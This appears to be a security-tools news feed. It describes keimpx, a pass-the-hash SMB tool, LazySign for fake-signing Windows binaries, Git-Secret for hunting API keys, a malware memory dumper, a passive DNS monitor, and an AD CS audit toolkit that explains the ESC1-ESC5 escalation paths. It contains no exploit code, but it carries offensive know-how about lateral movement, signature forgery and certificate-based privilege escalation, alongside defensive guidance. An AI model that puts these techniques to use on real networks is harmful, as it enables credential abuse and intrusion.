Let's say you are performing an infrastructure penetration test of a large network, you owned a Windows workstation, escalated your privileges to Administrator or LOCAL SYSTEM and dumped password hashes.

You also enumerated the list of machines within the Windows domain via net command, ping sweep, ARP scan and network traffic sniffing.

Now, what if you want to check the validity of the dumped hashes, without the need to crack them, across the whole Windows network over SMB? What if you want to log in to one or more systems using the dumped NTLM hashes and then surf the shares or even spawn a command prompt?

Fire up keimpx and let it do the work for you!

Another scenario where it comes handy is discussed in this blog post.


Help message
keimpx 0.5.1-rc
by Bernardo Damele A. G. <[email protected]>

Usage: keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default: 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default: 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default: 10)
-b Batch mode: do not ask to get an interactive SMB shell
-x EXECUTELIST Execute a list of commands against all hosts

For examples see this wiki page.


Frequently Asked Questions

See this wiki page.


License

Copyright 2009-2020 Bernardo Damele A. G. [email protected]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.


Contributors

Thanks to:

  • deanx - for developing polenum and some classes ripped from him.
  • Wh1t3Fox - for updating polenum to make it compatible with newer versions of Impacket.
  • frego - for his Windows service bind-shell executable and help with the service deploy/undeploy methods.
  • gera, beto and the rest of the SecureAuth Corporation guys - for developing such an amazing Python library and providing it with examples.
  • NEXUS2345 - for updating and maintaining keimpx.


Process-Dump - Windows Tool For Dumping Malware PE Files From Memory Back To Disk For Analysis

23 August 2021 at 12:30
By: Zion3R


Process Dump is a Windows reverse-engineering command-line tool to dump malware memory components back to disk for analysis. Often malware files are packed and obfuscated before they are executed in order to avoid AV scanners, however when these files are executed they will often unpack or inject a clean version of the malware code in memory. A common task for malware researchers when analyzing malware is to dump this unpacked code back from memory to disk for scanning with AV products or for analysis with static analysis tools such as IDA.

Process Dump works for Windows 32 and 64 bit operating systems and can dump memory components from specific processes or from all processes currently running. Process Dump supports creation and use of a clean-hash database, so that dumping of all the clean files such as kernel32.dll can be skipped. Its main features include:

  • Dumps code from a specific process or all processes.
  • Finds and dumps hidden modules that are not properly loaded in processes.
  • Finds and dumps loose code chunks even if they aren't associated with a PE file. It builds a PE header and import table for the chunks.
  • Reconstructs imports using an aggressive approach.
  • Can run in close dump monitor mode ('-closemon'), where processes will be paused and dumped just before they terminate.
  • Multi-threaded, so when you are dumping all running processes it will go pretty quickly.
  • Can generate a clean hash database. Generate this before a machine is infected with malware so Process Dump will only dump the new malicious malware components.

I'm maintaining an official compiled release on my website here: http://split-code.com/processdump.html


Installation

You can download the latest compiled release of Process Dump here:

This tool requires Microsoft Visual C++ Redistributable for Visual Studio 2015 to be installed to work:


Compiling source code

This is designed for Visual Studio 2019 and works with the free Community edition. Just open the project file with VS2019 and compile, it should be that easy!


Example Usage

Dump all modules and hidden code chunks from all processes on your system (ignoring known clean modules):

  • pd64.exe -system

Run in terminate monitor mode. Until cancelled (CTRL-C), Process Dump will dump any process just before it terminates:

  • pd64.exe -closemon

Dump all modules and hidden code chunks from a specific process identifier:

  • pd64.exe -pid 0x18A

Dump all modules and hidden code chunk by process name:

  • pd64.exe -p .*chrome.*

Build clean-hash database. These hashes will be used to exclude modules from dumping with the above commands:

  • pd64.exe -db gen

Dump code from a specific address in PID 0x1a3:

  • pd64.exe -pid 0x1a3 -a 0xffb4000
  • Generates two files (32 and 64 bit) that can be loaded for analysis in IDA with generated PE headers and generated import table:
  • notepad_exe_x64_hidden_FFB40000.exe
  • notepad_exe_x86_hidden_FFB40000.exe

Example sandbox usage

If you are running an automated sandbox or manual anti-malware research environment, I recommend running the following process with Process Dump, run all commands as Administrator:

  • On your clean environment build the clean hash database:
  • pd64.exe -db gen
  • (or more quickly) pd64 -db genquick
  • Begin the Process Dump terminate monitor. Leave this running in the background to dump all the intermediate processes used by the malware:
  • pd64.exe -closemon
  • Run the malware file
  • Watch the malware install (and pd64 dumping any process that tries to close)
  • When you are ready to dump the running malware from memory, run the following command to dump all processes:
  • pd64.exe -system
  • All the dumped components will be in the working directory of pd64.exe. You can change the output path using the '-o' flag.

Notes on the naming convention of dumped modules:
  • 'hiddenmodule' in the filename instead of the module name indicates the module was not properly registered in the process.
  • 'codechunk' in the filename means that it is a reconstructed dump from a loose executable region. This can be for example injected code that did not have a PE header. Codechunks will be dumped twice, once with a reconstructed x86 and again with a reconstructed x64 header.

Example filenames of dumped files

  • notepad_exe_PID2990_hiddenmodule_16B8ABB0000_x86.dll
  • notepad_exe_PID3b5c_notepad.exe_7FF6E6630000_x64.exe
  • notepad_exe_PID2c54_codechunk_17BD0000_x86.dll
  • notepad_exe_PID2c54_codechunk_17BD0000_x64.dll

Help Page

Process Dump v2.1 Copyright © 2017, Geoff McDonald http://www.split-code.com/

Process Dump (pd.exe) is a tool used to dump both 32 and 64 bit executable modules back to disk from memory within a process address space. This tool is able to find and dump hidden modules as well as loose executable code chunks, and it uses a clean hash database to exclude dumping of known clean files. This tool uses an aggressive import reconstruction approach that links all DWORD/QWORDs that point to an export in the process to the corresponding export function. Process dump can be used to dump all unknown code from memory ('-system' flag), dump specific processes, or run in a monitoring mode that dumps all processes just before they terminate.
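
As a toy sketch of that linking idea (the addresses are fabricated; the real tool operates on live process memory and full export tables), the scan boils down to walking a dumped buffer pointer by pointer and matching values against known export addresses:

import struct

EXPORTS = {0x7FF6E6631000: "kernel32!CreateFileW"}  # hypothetical export map

def find_import_slots(buf, base, ptr_size=8):
    fmt = "<Q" if ptr_size == 8 else "<I"
    hits = []
    for off in range(0, len(buf) - ptr_size + 1, ptr_size):
        value = struct.unpack_from(fmt, buf, off)[0]
        if value in EXPORTS:
            hits.append((base + off, EXPORTS[value]))
    return hits

# Two pointer-sized slots: one hits a known export, one is junk.
buf = struct.pack("<QQ", 0x7FF6E6631000, 0x4141414141414141)
for addr, name in find_import_slots(buf, base=0x10000):
    print(hex(addr), "->", name)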

Before first using this tool, while on a clean workstation, the clean exclusion hash database can be generated by either:

  • pd -db gen
  • pd -db genquick

Example Usage:

  • pd -system
  • pd -pid 419
  • pd -pid 0x1a3
  • pd -pid 0x1a3 -a 0x401000 -o c:\dump\ -c c:\dump\test\clean.db
  • pd -p chrome.exe
  • pd -p "(?i).*chrome.*"
  • pd -closemon

Options:

  • -system

Dumps all modules not matching the clean hash database from all accessible processes into the working directory.

  • -pid <pid>

Dumps all modules not matching the clean hash database from the specified pid into the current working directory. Use a '0x' prefix to specify a hex PID.

  • -closemon

Runs in monitor mode. When any process is terminating, Process Dump will first dump the process.

  • -p <regex>

Dumps all modules not matching the clean hash database from processes whose names match the specified regex filter into the current working directory.

  • -a <module base address>

Dumps a module at the specified base address from the process.

  • -g

Forces generation of PE headers from scratch, ignoring existing headers.

  • -o <path>

Sets the default output root folder for dumped components.

  • -v

Verbose.

  • -nh

No header is printed in the output.

  • -nr

Disable recursion on hash database directory add or remove commands.

  • -ni

Disable import reconstruction.

  • -nc

Disable dumping of loose code regions.

  • -nt

Disable multithreading.

  • -nep

Disable entry point hashing.

  • -eprec

Force the entry point to be reconstructed, even if a valid one appears to exist.

  • -t <thread count>

Sets the number of threads to use (default 16).

  • -cdb <filepath>

Full filepath to the clean hash database to use for this run.

  • -edb <filepath>

Full filepath to the entrypoint hash database to use for this run.

  • -esdb <filepath>

Full filepath to the entrypoint short hash database to use for this run.

  • -db gen

Automatically processes a few common folders as well as all the currently running processes and adds the found module hashes to the clean hash database. It will recursively add all files in %WINDIR%, %HOMEPATH%, C:\Program Files and C:\Program Files (x86), as well as all modules in all running processes.

  • -db genquick

Adds the hashes from all modules in all processes to the clean hash database. Run this on a clean system.

  • -db add <dir>

Adds all the files in the specified directory recursively to the clean hash database.

  • -db rem <dir>

Removes all the files in the specified directory recursively from the clean hash database.

  • -db clean

Clears the clean hash database.

  • -db ignore

Ignores the clean hash database when dumping a process this time. All modules will be dumped even if a match is found.


Version history

Version 2.1 (February 12th, 2017)
  • Fixed a bug where the last section in some cases would instead be filled with zeros. Thanks to megastupidmonkey for reporting this issue.
  • Fixed a bug where 64-bit base addresses would be truncated to a 32-bit address. It now properly keeps the full 64-bit module base address. Thanks to megastupidmonkey for reporting this issue.
  • Addressed an issue where the Process Dump close monitor would crash csrss.exe.
  • Stopped Process Dump from hooking its own process in close monitor mode.

Version 2.0 (September 18th, 2016)
  • Added new flag '-closemon' which runs Process Dump in a monitoring mode. It will pause and dump any process just as it closes. This is designed to work well with malware analysis sandboxes, to be sure to dump malware from memory before the malicious process closes.
  • Upgraded Process Dump to be multi-threaded. Commands that dump or get hashes from multiple processes will run separate threads per operation. The default number of threads is 16, which speeds up dumping significantly.
  • Upgraded Process Dump to dump unattached code chunks found in memory. These are identified as executable regions in memory which are not attached to a module and do not have a PE header. It also requires that the codechunk refer to at least 2 imports to be considered valid in order to reduce noise. When dumped, a PE header is recreated along with an import table. Code chunks are fully supported by the clean hash database.
  • Added flags to control the filepath to the clean hash database as well as the output folder for dumped files.
  • Fix to generating clean hash database from user path that was causing a crash.
  • Fix to the flag '-g' that forces generation of PE headers. Previously, even if this flag was set, system dumps (-system) would ignore it when dumping a process.
  • Various performance improvements.
  • Upgraded project to VS2015.

Version 1.5 (November 21st, 2015)
  • Fixed bug where very large memory regions would cause Process Dump to hang.
  • Fixed bug where some modules at high addresses would not be found under 64-bit Windows.
  • More debug information now outputted under Verbose mode.

Version 1.4 (April 18th, 2015)
  • Added new aggressive import reconstruction approach. Now patches up all DWORDs and QWORDs in the module to the corresponding export match.
  • Added '-a (address to dump)' flag to dump a specific address. It will generate PE headers and build an import table for the address.
  • Added '-ni' flag to skip new import reconstruction algorithm.
  • Added '-g' flag to force generation of new PE header even if there exists one when dumping a module. This is good if the PE header is malformed for example.
  • Various bug fixes.

Version 1.3 (October 10th, 2013)
  • Improved handling of PE headers with sections that specify invalid virtual sizes and addresses.
  • Better module dumping methodology for dumping virtual sections down to disk sections.

Version 1.1 (April 8th, 2013)
  • Fixed a compatibility issue with Windows XP.
  • Corrected bug where process dump would print it is dumping a module but not actually dump it.
  • Implemented the '-pid ' dump flag.

Version 1.0 (April 2nd, 2013)
  • Initial release.


LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files

23 August 2021 at 21:30
By: Zion3R


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capable of stealing or forging fake signatures for binary files. All of these tools, however, have additional dependencies which require Go, Python, ...


This repo gives you the opportunity of fake signing with 0 additional dependencies, all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake signed binary. With some adjustments it could even be used to sign using valid certs as well ¯\_(ツ)_/¯



Git-Secret - Go Scripts For Finding An API Key / Some Keywords In Repository

24 August 2021 at 12:30
By: Zion3R


Go scripts for finding an API key / some keywords in repository

Update V1.0.1
  • Removing some checkers
  • Adding example file contains github dorks

How to Install

go get github.com/daffainfo/Git-Secret


How to Use
./Git-Secret
  • For the path containing dorks, you can fill it with some keywords, for example:

keyword.txt

password
username
keys
access_keys

Reference

DNSMonster - Passive DNS Capture/Monitoring Framework

24 August 2021 at 21:30
By: Zion3R


Passive DNS collection and monitoring built with Golang, Clickhouse and Grafana: dnsmonster implements a packet sniffer for DNS traffic. It can accept traffic from a pcap file, a live interface or a dnstap socket, and can be used to index and store thousands of DNS queries per second (it has been shown to be capable of indexing 200k+ DNS queries per second on a commodity computer). It aims to be scalable, simple and easy to use, and to help security teams understand the details of an enterprise's DNS traffic. dnsmonster does not seek to follow DNS conversations; rather, it aims to index DNS packets as soon as they come in. It also does not aim to breach the privacy of end-users, with the ability to mask the source IP from 1 to 32 bits, making the data potentially untraceable. Blogpost
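
A minimal sketch (not dnsmonster's implementation) of what masking a source IPv4 address down to its top N bits looks like; keeping 24 bits preserves the /24 network while discarding the host portion:

import ipaddress

def mask_source_ip(ip, keep_bits):
    addr = int(ipaddress.IPv4Address(ip))
    mask = ((1 << keep_bits) - 1) << (32 - keep_bits)
    return str(ipaddress.IPv4Address(addr & mask))

print(mask_source_ip("203.0.113.77", 24))  # 203.0.113.0
print(mask_source_ip("203.0.113.77", 8))   # 203.0.0.0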

IMPORTANT NOTE: The code before version 1.x is considered beta quality and is subject to breaking changes. Please check the release notes for each tag to see the list of breaking scenarios between each release, and how to mitigate potential data loss.



Main features
  • Can use Linux's afpacket and zero-copy packet capture.
  • Supports BPF
  • Can fuzz source IP to enhance privacy
  • Can have a pre-processing sampling ratio
  • Can have a list of "skip" fqdns to avoid writing some domains/suffix/prefix to storage, thus improving DB performance
  • Can have a list of "allow" domains to only log hits of certain domains in Clickhouse/Stdout/File
  • Modular output with different logic per output stream. Currently stdout/file/clickhouse
  • Hot-reload of skip and allow domain files
  • Automatic data retention policy using ClickHouse's TTL attribute
  • Built-in dashboard using Grafana
  • Can be shipped as a single, statically-linked binary
  • Ability to be configured using Env variables, command line options or configuration file
  • Ability to sample output metrics using ClickHouse's SAMPLE capability
  • High compression ratio thanks to ClickHouse's built-in LZ4 storage
  • Supports DNS Over TCP, Fragmented DNS (udp/tcp) and IPv6
  • Supports dnstap over a Unix socket or TCP

Related projects


PSPKIAudit - PowerShell toolkit for auditing Active Directory Certificate Services (AD CS)

25 August 2021 at 12:30
By: Zion3R


PowerShell toolkit for auditing Active Directory Certificate Services (AD CS).

It is built on top of PKISolution's PSPKI toolkit (Microsoft Public License). This repo contains a newer version of PSPKI than what's available in the PSGallery (see the PSPKI directory). Vadims Podans (the creator of PSPKI) graciously provided this version as it contains patches for several bugs.

This README is only meant as a starting point; for complete details and defensive guidance, please see the "Certified Pre-Owned" whitepaper.

The module contains the following main functions:

  1. Invoke-PKIAudit - Audits the current Forest's AD CS settings, primarily analyzing the CA server and published templates for potential privilege escalation opportunities.
  2. Get-CertRequest - Examines a CA's issued certificates by querying the CA's database. Primary intention is to discover certificate requests that may have abused a certificate template privilege escalation vulnerability. In addition, if a user or computer is compromised, incident responders can use it to find certificates the CA server had issued to the compromised user/computer (which should then be revoked).

WARNING: This code is beta! We are confident that Invoke-PKIAudit will not impact the environment as the amount of data it queries is quite limited. We have not done rigorous testing with Get-CertRequest against typical CA server workloads. Get-CertRequest queries the CA's database directly and may have to process thousands of results, which might impact performance.

IF THERE ARE NO RESULTS, THIS IS NOT A GUARANTEE THAT YOUR ENVIRONMENT IS SECURE!!

WE ALSO CANNOT GUARANTEE THAT OUR MITIGATION ADVICE WILL MAKE YOUR ENVIRONMENT SECURE OR WILL NOT DISRUPT OPERATIONS!

It is your responsibility to talk to your Active Directory/PKI/Architecture team(s) to determine the best mitigations for your environment.

If the code breaks, or we missed something, please submit an issue or pull request for a fix!


Setup

Requirements

Install the following using an elevated PowerShell prompt:

  • RSAT's Certificate Services and Active Directory features. Install with the following command:
Get-WindowsCapability -Online -Name "Rsat.*" | where Name -match "CertificateServices|ActiveDirectory" | Add-WindowsCapability -Online

Import

Download the module and extract it to a folder. Then, import the module using the following commands:

cd PSPKIAudit
Get-ChildItem -Recurse | Unblock-File

Import-Module .\PSPKIAudit.psm1

Auditing AD CS Misconfigurations

Running Invoke-PKIAudit [-CAComputerName CA.DOMAIN.COM | -CAName X-Y-Z] will run all auditing checks for your existing AD CS environment, including enumerating various Certificate Authority and Certificate Template settings.

Any misconfigurations (ESC1-8) will appear as properties on the CA/template results displayed to identify the specific misconfiguration found.

If you want to change the groups/users used to test enrollment/access control, modify the $CommonLowprivPrincipals regex at the top of Invoke-PKIAudit.ps1

If you want to export all CA information to a csv, run: Get-AuditCertificateAuthority [-CAComputerName CA.DOMAIN.COM | -CAName X-Y-Z] | Export-Csv -NoTypeInformation CAs.csv

If you want to export ALL published template information to a csv (not just vulnerable templates), run: Get-AuditCertificateTemplate [-CAComputerName CA.DOMAIN.COM | -CAName X-Y-Z] | Export-Csv -NoTypeInformation templates.csv


Output Explanation

There are two main sections of output, details about discovered CAs and details about potentially vulnerable templates.

For certificate authority results:

Certificate Authority Property Description
ComputerName The system the CA is running on.
CAName The name of the CA.
ConfigString The full COMPUTER\CA_NAME configuration string.
IsRoot If the CA is a root CA.
AllowsUserSuppliedSans If the CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set.
VulnerableACL Whether the CA has a vulnerable ACL setting.
EnrollmentPrincipals Principals who have the Enroll privilege at the CA level.
EnrollmentEndpoints The CA's web services enrollment endpoints.
NTLMEnrollmentEndpoints The CA's web services enrollment endpoints that have NTLM enabled.
DACL The full access control information.
Misconfigurations ESCX indicating the specific misconfiguration present (if any).

For certificate template results:

Property Description
CA The full CA ConfigString the template is published on (null for not published).
Name The template name.
SchemaVersion The schema version (1/2/3) of the template.
OID The unique object identifier for the template.
VulnerableTemplateACL True if the template has a vulnerable ACL setting.
LowPrivCanEnroll True if low-privileged users can enroll in the template.
EnrolleeSuppliesSubject True if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present (i.e., users can supply arbitrary SANs).
EnhancedKeyUsage The usage EKUs enabled in the template.
HasAuthenticationEku True if the template has an EKU that allows for authentication.
HasDangerousEku True if the template has a "dangerous" (Any Purpose or null) EKU.
EnrollmentAgentTemplate True if the template has the "Certificate Request Agent" EKU.
CAManagerApproval True if manager approvals are needed for enrollment.
IssuanceRequirements Authorized signature information.
ValidityPeriod How long the certificate is valid for.
RenewalPeriod The renewal period for the certificate.
Owner The principal who owns the certificate.
DACL The full access control information.
Misconfigurations ESCX indicating the specific misconfiguration present (if any).

ESC1 - Misconfigured Certificate Templates

Details

This privilege escalation scenario occurs when the following conditions are met:

  1. The Enterprise CA grants low-privileged users enrollment rights. The Enterprise CA's configuration must permit low-privileged users the ability to request certificates. See the "Background - Enrollment" section at the beginning of the whitepaper for more details.

  2. Manager approval is disabled. This setting necessitates that a user with certificate "manager" permissions review and approve the requested certificate before the certificate is issued. See the "Background - Issuance Requirements" section at the beginning of the whitepaper for more details.

  3. No authorized signatures are required. This setting requires any CSR to be signed by an existing authorized certificate. See the "Background - Issuance Requirements" section at the beginning of the whitepaper for more details.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Having certificate enrollment rights allows a low-privileged attacker to request and obtain a certificate based on the template. Enrollment Rights are granted via the certificate template AD object's security descriptor.

  5. The certificate template defines EKUs that enable authentication. Applicable EKUs include Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (OID 1.3.6.1.5.2.3.4), or Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2).

  6. The certificate template allows requesters to specify a subjectAltName (SAN) in the CSR. If a requester can specify the SAN in a CSR, the requester can request a certificate as anyone (e.g., a domain admin user). The certificate template's AD object specifies if the requester can specify the SAN in its mspki-certificate-name-flag property. The mspki-certificate-name-flag property is a bitmask and if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present, a requester can specify the SAN.

TL;DR This situation means that unprivileged users can request a certificate that can be used for domain authentication, where they can specify an arbitrary alternative name (like a domain admin). This can result in a working certificate for an elevated user like a domain admin!
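
As a small illustration of condition 6, the check reduces to a single bit test against the template's msPKI-Certificate-Name-Flag value (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is 0x1 per MS-CRTD; the value below is a hypothetical read from AD):

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # per MS-CRTD

name_flag = 0x1  # hypothetical msPKI-Certificate-Name-Flag value from AD
if name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
    print("Requesters can supply an arbitrary SAN in the CSR")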


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC1Template
SchemaVersion : 2
OID : ESC1 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.10657968.9897558)
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : True
EnhancedKeyUsage : Client Authentication (1.3.6.1.5.5.7.3.2)|Secure Email (1.3.6.1.5.5.7.3.4)|Encrypting File System (1.3.6.1.4.1.311.10.3.4)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC1

Mitigations

There are a few options. First, right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties"

  1. Remove the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag via "Subject Name", unchecking "Supply in Request".
    • This prevents arbitrary SAN specification in the CSR. Unless alternate names are really needed for this template, this is probably the best fix.
  2. Remove the "Client Authentication" and/or "Smart Card Logon" EKUS via "Extensions" -> "Application Policies".
    • This prevents domain authentication with this template.
  3. Enable "CA Certificate Manager Approval" in "Issuance Requirements".
    • This puts requests for this template in the "Pending Requests" queue that must be manually approved by a certificate manager.
  4. Enable "Authorized Signatures" in "Issuance Requirements" (if you know what you're doing).
    • This forces CSRs to be co-signed by an Enrollment Agent certificate.
  5. Remove the ability of low-privileged users to enroll in this template via "Security" by removing the appropriate Enroll privilege.

ESC2 - Misconfigured Certificate Templates

Details

This privilege escalation scenario occurs when the following conditions are met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

  2. Manager approval is disabled. Details are the same as in ESC1.

  3. No authorized signatures are required. Details are the same as in ESC1.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

  5. The certificate template defines Any Purpose EKUs or no EKU. The Any Purpose EKU (OID 2.5.29.37.0) can be used for (surprise!) any purpose, including client authentication. If no EKUs are specified - i.e. the pkiextendedkeyusage attribute is empty or doesn't exist - then the certificate is the equivalent of a subordinate CA certificate and can be used for anything.

TL;DR This is very similar to ESC1, however with the Any Purpose or no EKU, the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag does not need to be present.


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC2Template
SchemaVersion : 2
OID : ESC2 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.7730030.4389735)
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage :
HasAuthenticationEku : True
HasDangerousEku : True
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC2

Mitigations

There are a few options. First, right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties"

  1. Remove the ability of low-privileged users to enroll in this template via "Security" by removing the appropriate Enroll privilege.
    • This is likely the best fix, as these sensitive EKUs should not be available to low-privileged users!
  2. Enable "CA Certificate Manager Approval" in "Issuance Requirements".
    • This puts requests for this template in the "Pending Requests" queue that must be manually approved by a certificate manager.
  3. Enable "Authorized Signatures" in "Issuance Requirements" (if you know what you're doing).
    • This forces CSRs to be co-signed by an Enrollment Agent certificate.

ESC3 - Misconfigured Enrollment Agent Templates

Details

This privilege escalation scenario occurs when the following conditions are met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

  2. Manager approval is disabled. Details are the same as in ESC1.

  3. No authorized signatures are required. Details are the same as in ESC1.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

  5. The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1) allows a principal to enroll for another certificate template on behalf of another user.

  6. Enrollment agent restrictions are not implemented on the CA.

TL;DR Someone with a Certificate Request (aka Enrollment) Agent certificate can enroll in other certificates on behalf of any user in the domain, for any Schema Version 1 template or any Schema Version 2+ template that requires the appropriate "Authorized Signatures/Application Policy" Issuance Requirement, unless "Enrollment Agent Restrictions" are implemented at the CA level.


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC3Template
SchemaVersion : 2
OID : ESC3 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.4300342.10028552)
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage : Certificate Request Agent (1.3.6.1.4.1.311.20.2.1)
HasAuthenticationEku : False
HasDangerousEku : False
EnrollmentAgentTemplate : True
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC3

Mitigations

There are a few options. First, right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties"

  1. Remove the ability of low-privileged users to enroll in this template via "Security" by removing the appropriate Enroll privilege.
    • This is likely the best fix, as this sensitive EKU should not be available to low-privileged users!
  2. Enable "CA Certificate Manager Approval" in "Issuance Requirements".
    • This puts requests for this template in the "Pending Requests" queue that must be manually approved by a certificate manager.

You can also implement "Enrollment Agent Restrictions" via the Certification Authority console (certsrv.msc). On the affected CA, right click the CA name and click "Properties" -> "Enrollment Agents". There is more information on this approach here.


ESC4 - Vulnerable Certificate Template Access Control

Details

Certificate templates are securable objects in Active Directory, meaning they have a security descriptor that specifies which Active Directory principals have specific permissions over the template. Templates that have vulnerable access control grant unintended principals the ability to modify settings in the template. With modification rights, an attacker can set vulnerable EKUs (ESC1-ESC3), flip settings like CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (ESC1), and/or remove "Issuance Requirements" like manager approval or authorized signatures.


Example
[!] Potentially vulnerable Certificate Templates:

CA : dc.theshire.local\theshire-DC-CA
Name : ESC4Template
SchemaVersion : 2
OID : ESC4 Template (1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.1768738.6205646)
VulnerableTemplateACL : True
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage : Client Authentication (1.3.6.1.5.5.7.3.2)|Secure Email (1.3.6.1.5.5.7.3.4)|Encrypting File System (1.3.6.1.4.1.311.10.3.4)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\localadmin
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read, Write
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
THESHIRE\localadmin (Allow) - Read, Write
Misconfigurations : ESC4

Mitigations

Right click the affected certificate template in the Certificate Templates Console (certtmpl.msc) and click "Properties".

Go to "Security" and remove the vulnerable access control entry.


ESC5 - Vulnerable PKI AD Object Access Control

Details

A number of objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS system.

These possibilities include (but are not limited to):

  • CA server's AD computer object (i.e., compromise through RBCD)
  • The CA server's RPC/DCOM server
  • PKI-related AD objects. Any descendant AD object or container in the container CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC= (e.g., the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, etc.)

Due to the broad scope of this specific misconfiguration, we do not currently check for ESC5 by default in this toolkit.

Access paths into the CA server itself can be found in the current BloodHound collection.

The CA server's RPC/DCOM server security requires manual analysis.

The following commands output a list of users and the control/edit rights each user has over PKI-related AD objects.

$Controllers = Get-AuditPKIADObjectControllers
Format-PKIAdObjectControllers $Controllers

Ensure all principals in the results absolutely require the listed rights. Oftentimes non-tier-0 accounts (be they low-privileged users/groups or lower-privileged non-AD server admins) have control of PKI-related AD objects.


Example
THESHIRE\Cert Publishers (S-1-5-21-3022474190-4230777124-3051344698-517)
GenericAll CN=THESHIRE-DC-CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
